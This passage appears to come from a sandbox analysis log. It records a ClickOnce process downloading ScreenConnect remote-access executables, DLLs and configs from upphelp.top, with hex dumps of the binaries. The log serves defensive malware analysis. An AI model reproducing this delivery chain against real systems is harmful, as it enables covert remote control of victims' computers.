2024-09-30 12:20:08 UTC	16384	IN	Data Raw: fe 72 09 8b 48 08 03 ce 3b f9 72 0a 42 83 c0 28 3b d3 72 e8 33 c0 5f 5e 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a fe 68 20 2e 41 00 68 80 36 40 00 64 a1 00 00 00 00 50 83 ec 08 53 56 57 a1 04 40 41 00 31 45 f8 33 c5 50 8d 45 f0 64 a3 00 00 00 00 89 65 e8 c7 45 fc 00 00 00 00 68 00 00 40 00 e8 7c 00 00 00 83 c4 04 85 c0 74 54 8b 45 08 2d 00 00 40 00 50 68 00 00 40 00 e8 52 ff ff ff 83 c4 08 85 c0 74 3a 8b 40 24 c1 e8 1f f7 d0 83 e0 01 c7 45 fc fe ff ff ff 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c3 8b 45 ec 8b 00 33 c9 81 38 05 00 00 c0 0f 94 c1 8b c1 c3 8b 65 e8 c7 45 fc fe ff ff ff 33 c0 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc 55 8b ec 8b 45 08 b9 4d 5a 00 00 66 39 08 75 1d 8b 48 3c 03 c8 81 39 Data Ascii: rH;rB(;r3_^[]Ujh .Ah6@dPSVW@A1E3PEdeEh@\|tTE-@Ph@Rt:@$EMdY_^[]E38eE3MdY_^[]UEMZf9uH<9
2024-09-30 12:20:08 UTC	16384	IN	Data Raw: 64 00 65 00 2d 00 61 00 74 00 00 00 64 00 65 00 2d 00 63 00 68 00 00 00 64 00 65 00 2d 00 64 00 65 00 00 00 64 00 65 00 2d 00 6c 00 69 00 00 00 64 00 65 00 2d 00 6c 00 75 00 00 00 64 00 69 00 76 00 2d 00 6d 00 76 00 00 00 00 00 65 00 6c 00 2d 00 67 00 72 00 00 00 65 00 6e 00 2d 00 61 00 75 00 00 00 65 00 6e 00 2d 00 62 00 7a 00 00 00 65 00 6e 00 2d 00 63 00 61 00 00 00 65 00 6e 00 2d 00 63 00 62 00 00 00 65 00 6e 00 2d 00 67 00 62 00 00 00 65 00 6e 00 2d 00 69 00 65 00 00 00 65 00 6e 00 2d 00 6a 00 6d 00 00 00 65 00 6e 00 2d 00 6e 00 7a 00 00 00 65 00 6e 00 2d 00 70 00 68 00 00 00 65 00 6e 00 2d 00 74 00 74 00 00 00 65 00 6e 00 2d 00 75 00 73 00 00 00 65 00 6e 00 2d 00 7a 00 61 00 00 00 65 00 6e 00 2d 00 7a 00 77 00 00 00 65 00 73 00 2d 00 61 00 72 00 00 Data Ascii: de-atde-chde-dede-lide-ludiv-mvel-gren-auen-bzen-caen-cben-gben-ieen-jmen-nzen-phen-tten-usen-zaen-zwes-ar
2024-09-30 12:20:08 UTC	13816	IN	Data Raw: 1f 33 30 33 9a 33 a1 33 b3 33 bc 33 04 34 16 34 1e 34 28 34 31 34 42 34 54 34 6f 34 af 34 c1 34 c7 34 db 34 2f 35 39 35 3f 35 45 35 b0 35 b9 35 f2 35 fd 35 f2 37 25 38 2a 38 50 39 68 39 95 39 b0 39 c0 39 c5 39 cf 39 d4 39 df 39 ea 39 fe 39 4f 3a f6 3a 17 3b 70 3b 7b 3b ca 3b e2 3b 2c 3c c2 3c d9 3c 57 3d 9b 3d ad 3d e3 3d e8 3d f5 3d 01 3e 17 3e 2a 3e 5d 3e 6c 3e 71 3e 82 3e 88 3e 93 3e 9b 3e a6 3e ac 3e b7 3e bd 3e cb 3e d4 3e d9 3e e6 3e eb 3e f8 3e 06 3f 0d 3f 15 3f 2e 3f 40 3f 4c 3f 54 3f 6c 3f 91 3f a2 3f ab 3f f2 3f 00 60 00 00 18 01 00 00 26 30 4d 30 67 30 be 30 cb 30 d6 30 e0 30 e6 30 fa 30 06 31 7f 31 88 31 b4 31 bd 31 c5 31 e2 31 07 32 19 32 35 32 59 32 74 32 7f 32 25 33 d8 33 e1 33 e9 33 04 35 0a 35 1c 35 2f 35 7f 35 b0 35 e0 35 2b 36 27 37 3b Data Ascii: 3033333444(414B4T4o44444/595?5E555557%88P9h9999999999O::;p;{;;;,<<<W======>>>]>l>q>>>>>>>>>>>>>>>???.?@?L?T?l?????`&0M0g000000011111112252Y2t22%3333555/5555+6'7;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49727	79.110.49.196	443	5576	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-30 12:20:08 UTC	127	OUT	GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1 Host: upphelp.top Accept-Encoding: gzip Connection: Keep-Alive
2024-09-30 12:20:09 UTC	216	IN	HTTP/1.1 200 OK Cache-Control: private Content-Length: 61216 Content-Type: text/html Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0 Date: Mon, 30 Sep 2024 12:20:09 GMT Connection: close
2024-09-30 12:20:09 UTC	16168	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4c e0 0e b8 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 ba 00 00 00 0a 00 00 00 00 00 00 06 d8 00 00 00 20 00 00 00 e0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 01 00 00 02 00 00 33 5d 01 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELL"0 @ 3]@
2024-09-30 12:20:09 UTC	16384	IN	Data Raw: 16 00 01 00 93 0e 06 00 de 10 22 0a 06 00 60 10 22 0a 06 00 42 26 7b 0e 06 00 e9 1d 68 0e 06 00 31 0f 46 00 06 00 f3 1a 9d 0e 06 00 53 1f a1 0e 06 00 79 27 a6 0e 06 00 84 18 22 0a 36 00 6d 08 aa 0e 16 00 9b 00 af 0e 16 00 b4 00 af 0e 16 00 29 03 af 0e 36 00 6d 08 b9 0e 16 00 37 01 af 0e 06 00 bf 1c be 0e 16 00 a8 1a c3 0e 36 00 6d 08 d0 0e 16 00 25 00 d5 0e 16 00 36 19 87 0e 36 00 6d 08 e7 0e 16 00 ff 07 ec 0e 16 00 36 08 f7 0e 06 00 0f 2f 01 0f 06 00 51 20 57 0e 06 00 c6 19 06 0f 06 00 d8 19 06 0f 06 00 70 19 0b 0f 16 00 a8 1a c3 0e 36 00 6d 08 10 0f 16 00 e7 00 15 0f 16 00 46 03 1e 0f 16 00 d4 05 29 0f 16 00 c1 06 34 0f 16 00 6b 07 34 0f 16 00 73 03 49 0f 16 00 83 01 54 0f 16 00 d5 03 5f 0f 36 00 6d 08 cb 0a 16 00 be 01 c2 0a 16 00 f9 03 c2 0a 16 00 19 Data Ascii: "`"B&{h1FSy'"6m)6m76m%66m6/Q Wp6mF)4k4sIT_6m
2024-09-30 12:20:09 UTC	16384	IN	Data Raw: 54 68 72 65 73 68 6f 6c 64 4c 61 62 65 6c 00 53 79 73 74 65 6d 2e 43 6f 6d 70 6f 6e 65 6e 74 4d 6f 64 65 6c 00 61 64 64 5f 4d 6f 75 73 65 57 68 65 65 6c 00 50 6f 70 75 6c 61 74 65 50 61 6e 65 6c 00 65 6d 70 74 79 52 65 73 75 6c 74 73 50 61 6e 65 6c 00 72 65 73 75 6c 74 73 50 61 6e 65 6c 00 70 61 6e 65 6c 00 53 65 6c 65 63 74 41 6c 6c 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 57 69 6e 64 6f 77 73 42 61 63 6b 73 74 61 67 65 53 68 65 6c 6c 00 73 65 74 5f 41 75 74 6f 53 63 72 6f 6c 6c 00 41 73 73 65 72 74 4e 6f 6e 4e 75 6c 6c 00 67 65 74 5f 43 6f 6e 74 72 6f 6c 00 53 63 72 6f 6c 6c 61 62 6c 65 43 6f 6e 74 72 6f 6c 00 63 6f 6e 74 72 6f 6c 00 67 65 74 5f 4c 50 61 72 61 6d 00 67 65 74 5f 57 50 61 72 61 6d 00 50 72 6f 67 72 61 6d 00 67 65 74 5f 49 74 65 6d 00 Data Ascii: ThresholdLabelSystem.ComponentModeladd_MouseWheelPopulatePanelemptyResultsPanelresultsPanelpanelSelectAllScreenConnect.WindowsBackstageShellset_AutoScrollAssertNonNullget_ControlScrollableControlcontrolget_LParamget_WParamProgramget_Item
2024-09-30 12:20:09 UTC	12280	IN	Data Raw: 43 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 2e 00 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 42 00 61 00 63 00 6b 00 73 00 74 00 61 00 67 00 65 00 53 00 68 00 65 00 6c 00 6c 00 2e 00 65 00 78 00 65 00 00 00 3c 00 0e 00 01 00 50 00 72 00 6f 00 64 00 75 00 63 00 74 00 4e 00 61 00 6d 00 65 00 00 00 00 00 53 00 63 00 72 00 65 00 65 00 6e 00 43 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 00 00 3e 00 0d 00 01 00 50 00 72 00 6f 00 64 00 75 00 63 00 74 00 56 00 65 00 72 00 73 00 69 00 6f 00 6e 00 00 00 32 00 34 00 2e 00 32 00 2e 00 31 00 30 00 2e 00 38 00 39 00 39 00 31 00 00 00 00 00 42 00 0d 00 01 00 41 00 73 00 73 00 65 00 6d 00 62 00 6c 00 79 00 20 00 56 00 65 00 72 00 73 00 69 00 6f 00 6e 00 00 00 32 00 34 00 2e 00 32 00 2e 00 31 00 30 00 2e 00 38 00 39 00 39 00 31 Data Ascii: Connect.WindowsBackstageShell.exe<ProductNameScreenConnect>ProductVersion24.2.10.8991BAssembly Version24.2.10.8991

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49728	79.110.49.196	443	5576	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-30 12:20:09 UTC	131	OUT	GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1 Host: upphelp.top Accept-Encoding: gzip Connection: Keep-Alive
2024-09-30 12:20:10 UTC	214	IN	HTTP/1.1 200 OK Cache-Control: private Content-Length: 266 Content-Type: text/html Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0 Date: Mon, 30 Sep 2024 12:20:10 GMT Connection: close
2024-09-30 12:20:10 UTC	266	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 3e 0d 0a 20 20 3c 73 74 61 72 74 75 70 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 34 2e 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 32 2e 30 2e 35 30 37 32 37 22 20 2f 3e 0d 0a 20 20 3c 2f 73 74 61 72 74 75 70 3e 0d 0a 20 20 3c 72 75 6e 74 69 6d 65 3e 0d 0a 20 20 20 20 3c 67 65 6e 65 72 61 74 65 50 75 62 6c 69 73 68 65 72 45 76 69 64 65 6e 63 65 20 65 6e 61 62 6c 65 64 3d 22 66 61 6c 73 65 22 20 2f 3e 0d 0a 20 20 3c 2f 72 75 6e 74 69 6d 65 3e 0d 0a 3c 2f 63 6f 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime></con

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49730	79.110.49.196	443	5576	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-30 12:20:11 UTC	126	OUT	GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1 Host: upphelp.top Accept-Encoding: gzip Connection: Keep-Alive
2024-09-30 12:20:11 UTC	214	IN	HTTP/1.1 200 OK Cache-Control: private Content-Length: 266 Content-Type: text/html Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0 Date: Mon, 30 Sep 2024 12:20:11 GMT Connection: close
2024-09-30 12:20:11 UTC	266	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 3e 0d 0a 20 20 3c 73 74 61 72 74 75 70 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 34 2e 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 32 2e 30 2e 35 30 37 32 37 22 20 2f 3e 0d 0a 20 20 3c 2f 73 74 61 72 74 75 70 3e 0d 0a 20 20 3c 72 75 6e 74 69 6d 65 3e 0d 0a 20 20 20 20 3c 67 65 6e 65 72 61 74 65 50 75 62 6c 69 73 68 65 72 45 76 69 64 65 6e 63 65 20 65 6e 61 62 6c 65 64 3d 22 66 61 6c 73 65 22 20 2f 3e 0d 0a 20 20 3c 2f 72 75 6e 74 69 6d 65 3e 0d 0a 3c 2f 63 6f 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime></con

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49731	79.110.49.196	443	5576	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-30 12:20:11 UTC	134	OUT	GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1 Host: upphelp.top Accept-Encoding: gzip Connection: Keep-Alive
2024-09-30 12:20:12 UTC	214	IN	HTTP/1.1 200 OK Cache-Control: private Content-Length: 266 Content-Type: text/html Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0 Date: Mon, 30 Sep 2024 12:20:11 GMT Connection: close
2024-09-30 12:20:12 UTC	266	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 3e 0d 0a 20 20 3c 73 74 61 72 74 75 70 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 34 2e 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 32 2e 30 2e 35 30 37 32 37 22 20 2f 3e 0d 0a 20 20 3c 2f 73 74 61 72 74 75 70 3e 0d 0a 20 20 3c 72 75 6e 74 69 6d 65 3e 0d 0a 20 20 20 20 3c 67 65 6e 65 72 61 74 65 50 75 62 6c 69 73 68 65 72 45 76 69 64 65 6e 63 65 20 65 6e 61 62 6c 65 64 3d 22 66 61 6c 73 65 22 20 2f 3e 0d 0a 20 20 3c 2f 72 75 6e 74 69 6d 65 3e 0d 0a 3c 2f 63 6f 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime></con

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49732	79.110.49.196	443	5576	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-30 12:20:12 UTC	124	OUT	GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1 Host: upphelp.top Accept-Encoding: gzip Connection: Keep-Alive
2024-09-30 12:20:13 UTC	216	IN	HTTP/1.1 200 OK Cache-Control: private Content-Length: 81696 Content-Type: text/html Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0 Date: Mon, 30 Sep 2024 12:20:12 GMT Connection: close
2024-09-30 12:20:13 UTC	16168	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 50 da a7 bb 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 40 00 00 00 d4 00 00 00 00 00 00 e6 5e 00 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 01 00 00 02 00 00 6a 8b 01 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELP"0@^ `@ `j@
2024-09-30 12:20:13 UTC	16384	IN	Data Raw: 2d 34 35 32 62 2d 38 39 37 35 2d 37 34 61 38 35 38 32 38 64 33 35 34 00 00 13 01 00 02 00 00 00 04 54 65 78 74 05 53 74 61 74 65 00 00 08 01 00 0b 00 00 00 00 00 00 00 d2 59 fd a1 c3 db f8 b2 a8 38 41 41 b5 70 2f b9 70 e0 44 04 4a 6f 16 7f 54 f3 2d 91 6d bf ac 66 21 46 ef be d1 1e 85 dd 2b 75 b8 ff 7a 0d c8 39 d0 7b 2a 86 54 8d 79 d9 5d b2 8a 3c 12 a6 c1 3c 94 5c c5 c2 54 9b e5 b0 38 01 34 d6 47 4a 0b 62 7d 82 0a bc 8e 63 9f ae dc 13 7e 39 98 c7 b5 f2 fd 11 5b 4c 23 82 a4 fd 40 df 22 18 d8 3f 0b 56 59 b3 b5 88 4c 17 d4 e9 59 bc f3 d5 72 d6 78 1b 00 00 00 00 81 c5 e8 85 00 00 00 00 02 00 00 00 7b 00 00 00 18 5e 00 00 18 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 52 53 44 53 cb 4c a1 5b 4d 39 69 48 9a 46 34 Data Ascii: -452b-8975-74a85828d354TextStateY8AAp/pDJoT-mf!F+uz9{*Ty]<<\T84GJb}c~9[L#@"?VYLYrx{^@RSDSL[M9iHF4
2024-09-30 12:20:13 UTC	16384	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 d2 ff ff 55 d1 fe ff 54 d0 fd ff 53 cf fb ff 52 cc f8 ff 51 c9 f4 ff 50 c6 f0 ff 4e c2 eb ff 4c bc e5 ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff 4c bc e5 ff 4e c2 eb ff 50 c6 f0 ff 51 c9 f4 ff 52 cc f8 ff 53 ce fa ff 54 d0 fd ff 55 d1 fe ff 55 d2 ff Data Ascii: UUTSRQPNL::::::::::::::::::::::::::::::::::::::LNPQRSTUU
2024-09-30 12:20:13 UTC	16384	IN	Data Raw: 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 00 00 00 Data Ascii: fffffffffffffffgggggggggggggggggggggggggggggggggggggggggg
2024-09-30 12:20:13 UTC	16376	IN	Data Raw: 00 9a dc ff 00 9a dc ff 00 9a dc ff 00 9a dc ff 00 9a dc ff 00 9a dc ff 00 9a dc ff 6e cd f3 ff 85 e0 ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 9a e5 ff ef 00 00 00 00 00 00 00 00 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 cf 00 9f e0 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9f e0 ef 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 cf 00 9f e0 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	49733	79.110.49.196	443	5576	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-30 12:20:14 UTC	88	OUT	GET /Bin/ScreenConnect.Client.dll HTTP/1.1 Host: upphelp.top Accept-Encoding: gzip
2024-09-30 12:20:14 UTC	217	IN	HTTP/1.1 200 OK Cache-Control: private Content-Length: 197120 Content-Type: text/html Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0 Date: Mon, 30 Sep 2024 12:20:13 GMT Connection: close
2024-09-30 12:20:14 UTC	16167	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5a 3c cd b8 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 fa 02 00 00 06 00 00 00 00 00 00 82 18 03 00 00 20 00 00 00 20 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 03 00 00 02 00 00 9e 14 03 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELZ<" 0 `@
2024-09-30 12:20:14 UTC	16384	IN	Data Raw: 00 0a 26 06 72 59 01 00 70 6f 76 00 00 0a 26 02 06 28 f6 02 00 06 2c 09 06 1f 20 6f 77 00 00 0a 26 06 1f 7d 6f 77 00 00 0a 26 06 6f 29 00 00 0a 2a 0a 16 2a 2e 02 03 28 f8 02 00 06 16 fe 01 2a 26 0f 00 03 28 fb 02 00 06 2a 0a 16 2a 5e 03 75 77 00 00 02 2c 0d 02 03 a5 77 00 00 02 28 fb 02 00 06 2a 16 2a 0a 17 2a 00 13 30 02 00 40 00 00 00 0c 00 00 11 73 75 00 00 0a 0a 06 72 c3 0f 00 70 6f 76 00 00 0a 26 06 72 59 01 00 70 6f 76 00 00 0a 26 02 06 28 fd 02 00 06 2c 09 06 1f 20 6f 77 00 00 0a 26 06 1f 7d 6f 77 00 00 0a 26 06 6f 29 00 00 0a 2a 0a 16 2a 2e 02 03 28 ff 02 00 06 16 fe 01 2a 26 0f 00 03 28 02 03 00 06 2a 0a 16 2a 5e 03 75 78 00 00 02 2c 0d 02 03 a5 78 00 00 02 28 02 03 00 06 2a 16 2a 0a 17 2a 00 13 30 02 00 40 00 00 00 0c 00 00 11 73 75 00 00 0a 0a Data Ascii: &rYpov&(, ow&}ow&o)*.(&(^uw,w(0@surpov&rYpov&(, ow&}ow&o).(&(^ux,x(*0@su
2024-09-30 12:20:14 UTC	16384	IN	Data Raw: 04 02 7e 2c 02 00 0a 7d 06 01 00 04 02 15 7d 07 01 00 04 02 28 ef 00 00 0a 6f 2f 02 00 0a 7d 04 01 00 04 02 7b 04 01 00 04 03 06 7b 6b 01 00 04 6f 30 02 00 0a 06 7b 6b 01 00 04 6f 31 02 00 0a 6f 32 02 00 0a 02 7b 04 01 00 04 05 0e 04 6f 33 02 00 0a 02 7b 04 01 00 04 16 16 06 7b 6b 01 00 04 6f 30 02 00 0a 06 7b 6b 01 00 04 6f 31 02 00 0a 73 95 01 00 0a 06 fe 06 b5 04 00 06 73 34 02 00 0a 28 35 02 00 0a de 10 26 02 28 14 04 00 06 fe 1a 07 28 bd 00 00 0a dc 2a 00 00 00 01 1c 00 00 00 00 66 00 76 dc 00 09 16 00 00 01 02 00 1a 00 cb e5 00 07 00 00 00 00 1b 30 03 00 42 00 00 00 25 00 00 11 02 7b 03 01 00 04 0a 06 28 b8 00 00 0a 02 28 15 04 00 06 72 cb 17 00 70 18 28 36 02 00 0a 26 02 17 28 1e 04 00 06 de 19 02 7b 04 01 00 04 6f 37 02 00 0a 02 28 14 04 00 06 dc Data Ascii: ~,}}(o/}{{ko0{ko1o2{o3{{ko0{ko1ss4(5&((*fv0B%{((rp(6&({o7(
2024-09-30 12:20:14 UTC	16384	IN	Data Raw: 01 47 1f 16 00 f6 03 58 1f 16 00 30 07 69 1f 16 00 ab 08 47 1f 16 00 30 04 71 1f 16 00 4d 07 7b 1f 16 00 01 00 85 1f 16 00 3b 03 85 1f 06 00 ce 72 8e 1f 06 00 69 5c 9d 1d 06 00 ce 72 8e 1f 06 00 a5 75 8e 1d 01 00 e3 74 93 1f 01 00 e5 59 a9 10 01 00 50 37 99 1f 36 00 56 0a 9e 1f 16 00 8a 02 a3 1f 36 00 56 0a af 1f 16 00 a0 00 a3 1f 36 00 56 0a e6 11 16 00 70 00 dc 11 16 00 94 03 52 12 06 00 12 81 64 07 06 00 06 63 b4 11 06 00 7b 6d 0f 11 06 00 ce 72 b9 11 06 00 71 32 c6 11 06 00 9c 79 cb 11 06 00 90 83 a6 10 06 00 a9 62 2c 13 06 00 ce 72 b9 11 06 00 19 0d 58 04 06 00 26 77 b4 1f 06 00 ce 72 b9 1f 06 00 ac 65 7a 1e 06 00 7d 5d cb 11 36 00 56 0a be 1f 16 00 6c 01 c3 1f 06 00 ce 72 d5 1f 06 00 12 81 2a 1f 06 00 1a 63 da 1f 06 00 e4 7d 74 1d 06 00 79 59 ec 1f Data Ascii: 